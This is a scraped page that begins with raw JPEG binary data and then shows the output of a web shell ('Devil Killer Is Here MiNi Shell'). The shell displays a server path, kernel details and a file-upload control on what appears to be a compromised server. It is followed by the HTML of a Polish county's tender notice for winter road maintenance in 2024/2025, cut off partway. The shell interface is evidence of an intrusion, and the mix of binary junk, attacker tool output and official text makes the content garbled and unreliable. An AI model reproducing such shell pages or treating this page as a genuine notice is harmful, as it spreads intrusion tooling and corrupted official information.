JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241024/0056285401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie 2024/2025 z podziałem na zadania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Wołowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934800</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Piastowski 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wołów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatwolowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatwolowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie 2024/2025 z podziałem na zadania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63b20740-b06f-4f45-9f83-936ee243c365</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00562854</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00067959/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie 2024/2025 z podziałem na zadania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiatwolowski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/powiatwolowski<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. <br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>W sytuacjach awaryjnych z wyjątkiem składania ofert zamawiający dopuszcza komunikację elektroniczną poprzez e-mail: zamowienia@powiatwolowski.pl <br/>Szczegółowy zakres w Rozdz. 13 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d)	włączona obsługa JavaScript,<br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f)	szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>Szczegółowy zakres w Rozdz. 13 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:1)Administratorem Pani/Pana danych osobowych jest Starosta Wołowski, z siedzibą w: 56 – 100 Wołów, Pl. Piastowski 2, tel.: +48 71 380 59 01.2)Informujemy, że wyznaczyliśmy Inspektora Ochrony Danych. Może Pani/Pan skontaktować się z nim poprzez wiadomość wysłaną na adres e-mail: iod@powiatwolowski.pl lub listownie na adres: Starostwo Powiatowe w Wołowie, 56 – 100 Wołów, Pl. Piastowski 2.3)Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>-art. 6 ust. 1 lit. c RODO oraz ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych, dalej „ustawa Pzp’’, w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>W przypadku złożenia najkorzystniejszej oferty Administrator będzie przetwarzał dane osobowe w celu zawarcia i realizacji umowy (na podstawie art. 6 ust. 1 lit. b RODO), jak również do dochodzenia potencjalnych roszczeń związanych z zawartą umową (na podstawie art. 6 ust. 1 lit. f RODO) oraz w celach archiwalnych (na podstawie art. 6 ust. 1 lit. c RODO); dodatkowo, przepisy prawa wymagają od administratora danych przetwarzania danych dla celów podatkowych i rachunkowych.4)Odbiorcami Pani/Pana danych osobowych będą:<br/>-podmioty upoważnione na podstawie przepisów prawa,<br/>-osoby lub podmioty, którym udostępniona zostanie dokumentacja niniejszego postępowania zgodnie z art. 18 oraz art. 74 ustawy Pzp,<br/>-podmioty wykonujące zadania zlecone przez Administratora, w szczególności: dostawcy usług IT, podmioty prowadzące działalność pocztową lub kurierską, podmioty świadczące usługi prawnicze, przy czym takie podmioty będą przetwarzać dane na podstawie umowy i wyłącznie zgodnie z jego poleceniami.5)Okres przechowywania danych:a)w odniesieniu do podmiotów, których oferta nie została wybrana - przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,b)w przypadku zawarcia umowy - do momentu obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania, a także po jej zakończeniu, tj.:<br/>-przez okres 5 lat od dnia zakończenia niniejszego postępowania,<br/>-dane zawarte na umowie – do czasu przedawnienia lub wygaśnięcia na innej podstawie ewentualnych roszczeń wynikających z umowy, <br/>-w celach wynikających z przepisów prawa, w szczególności obowiązku przechowywania dokumentów księgowych, wystawienia faktur itp.,6)Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.7)Pani/Pana dane osobowe nie będą przekazywane do państw trzecich, nie będą przetwarzane w sposób zautomatyzowany, nie będą poddawane profilowaniu.8)Posiada Pani/Pan:a)na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ,c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ,d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9)Nie przysługuje Pani/Panu:a)w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIT.272.25.2024.ZDP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczeniem usług związanych z zimowym utrzymaniem dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie 2024/2025 z podziałem na zadania (części), w ramach bieżącego utrzymania dróg.<br/><br/>zadanie nr 1 – zimowe utrzymanie dróg wojewódzkich – usługi odśnieżania i zwalczania śliskości zimowej wraz z miesięczną gotowością <br/>-długość dróg wojewódzkich 91,287 km<br/>-szacunkowy czas pracy 180 godzin<br/>-szacunkowe wykonanie mieszanki uszorstniajacej 400 ton<br/><br/>Szczegółowy zakres i wymagania dotyczące wykonania przedmiotu zamówienia określają: <br/>1)	Opis Przedmiotu Zamówienia – załącznik nr 6 do SWZ, <br/>2)	Projekt umowy stanowiący załącznik nr 8 do SWZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty dla zadania nr 1 zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>l.p.	Kryterium	Waga – udział w ocenie<br/>1.	Cena oferty (z podatkiem VAT) – C	60% = 60 pkt<br/>2.	Czas rozpoczęcia pracy przy ZUD (odśnieżanie i zwalczanie śliskości) przez jednostkę sprzętową – Rp	40% = 40 pkt<br/><br/>Kryterium „CENA” - C<br/>Kryterium to będzie rozpatrywane na podstawie ceny ofertowej brutto (suma cen składowych) za wykonanie przedmiotu zamówienia (dla każdego zadania) wpisanych przez wykonawcę w formularzu oferty.<br/>Przyjmuje się, że najwyższą ilość punktów, tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach na wykonanie zamówienia objętego zamówieniem (zadania). <br/><br/>Ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/>	C = (C min / C bad) x 60 pkt<br/> gdzie: <br/> C – ilość punktów przyznana ofercie za kryterium „Cena”<br/> C min – wartość brutto przedstawiona w najkorzystniejszej pod tym względem ofercie, czyli najniższa cena brutto spośród ofert nieodrzuconych<br/>C bad – cena brutto w badanej ofercie<br/><br/>Uzyskana liczba punktów w ramach kryterium „cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>Kryterium „CZAS ROZPOCZĘCIA PRACY PRZY ZUD PRZEZ JEDNOSTKĘ SPRZĘTOWĄ” - Rp<br/><br/>	Kryterium to będzie rozpatrywane na podstawie ilości godzin zadeklarowanej przez wykonawcę w ofercie.<br/>	Czas rozpoczęcia pracy przy ZUD przez jednostki sprzętowe oznacza czas na załadunek i dojazd do miejsca rozpoczęcia akcji. <br/>W ww. kryterium można uzyskać maksymalnie 40 pkt, a ocena punktowa zostanie dokonana na podstawie deklaracji wykonawcy złożonej w ofercie i tak:<br/><br/>Czas rozpoczęcia pracy przy ZUD przez jednostkę sprzętową Ilość punktów<br/>1,0 godzina 40<br/>1,5 godziny 20<br/>2,0 godziny 0<br/><br/>W przypadku, gdy wszyscy Wykonawcy zaproponują jednakową wartość, wszyscy otrzymają liczbę punktów w danym kryterium. <br/> <br/>UWAGA: <br/>-W przypadku nie usunięcia/nie przekreślenia dwóch z podanych trzech terminów rozpoczęcia pracy w formularzu oferty, zamawiający przyjmie do oceny najdłuższy czas rozpoczęcia pracy tj. 2,0 godziny a wykonawca w tym kryterium otrzyma 0 pkt.<br/>-W przypadku pozostawienia bez usunięcia/bez przekreślenia wszystkich (trzech) terminów rozpoczęcia pracy w formularzu oferty, zamawiający przyjmie do oceny najdłuższy czas rozpoczęcia pracy tj. 2,0 godziny a wykonawca w tym kryterium otrzyma 0 pkt.<br/>-W przypadku usunięcia/przekreślenia wszystkich (trzech) terminów rozpoczęcia pracy w formularzu oferty, zamawiający odrzuci ofertę wykonawcy, zgodnie z art. 226 ust. 1 pkt 5 ustawy Pzp. <br/><br/>Suma punktów uzyskanych w kryteriach „cena” oraz „czas rozpoczęcia pracy przy ZUD przez jednostkę transportową” stanowić będzie o ogólnej sumie punktów uzyskanych przez ofertę.<br/><br/>2.	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą łączną ilość punktów wg powyższych zasad. Ocenie podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>3.	Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i czasu rozpoczęcia pracy, zamawiający spośród tych ofert wybierze ofertę z najniższą ceną jednostkową za środki sprzętowo-transportowe do odśnieżania i usuwania śliskości zimowej (pługo-piaskarka), a jeżeli zostaną złożone oferty o takiej samej cenie, zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpoczęcia pracy przy ZUD (odśnieżanie i zwalczanie śliskości) przez jednostkę sprzętową</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczeniem usług związanych z zimowym utrzymaniem dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie 2024/2025 z podziałem na zadania (części), w ramach bieżącego utrzymania dróg.<br/><br/>zadanie nr 2 – zimowe utrzymanie dróg powiatowych – usługi odśnieżania i zwalczania śliskości zimowej wraz z miesięczną gotowością <br/>-długość dróg powiatowych 205,327 km<br/>-szacunkowy czas pracy 220 godzin<br/>-szacunkowe wykonanie mieszanki uszorstniajacej 420 ton<br/><br/>Szczegółowy zakres i wymagania dotyczące wykonania przedmiotu zamówienia określają: <br/>1)	Opis Przedmiotu Zamówienia – załącznik nr 6 do SWZ, <br/>2)	Projekt umowy stanowiący załącznik nr 8 do SWZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty dla zadania nr 2 zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>l.p.	Kryterium	Waga – udział w ocenie<br/>1.	Cena oferty (z podatkiem VAT) – C	60% = 60 pkt<br/>2.	Czas rozpoczęcia pracy przy ZUD (odśnieżanie i zwalczanie śliskości) przez jednostkę sprzętową – Rp	40% = 40 pkt<br/><br/>Kryterium „CENA” - C<br/>Kryterium to będzie rozpatrywane na podstawie ceny ofertowej brutto (suma cen składowych) za wykonanie przedmiotu zamówienia (dla każdego zadania) wpisanych przez wykonawcę w formularzu oferty.<br/>Przyjmuje się, że najwyższą ilość punktów, tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach na wykonanie zamówienia objętego zamówieniem (zadania). <br/><br/>Ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/>	C = (C min / C bad) x 60 pkt<br/> gdzie: <br/> C – ilość punktów przyznana ofercie za kryterium „Cena”<br/> C min – wartość brutto przedstawiona w najkorzystniejszej pod tym względem ofercie, czyli najniższa cena brutto spośród ofert nieodrzuconych<br/>C bad – cena brutto w badanej ofercie<br/><br/>Uzyskana liczba punktów w ramach kryterium „cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>Kryterium „CZAS ROZPOCZĘCIA PRACY PRZY ZUD PRZEZ JEDNOSTKĘ SPRZĘTOWĄ” - 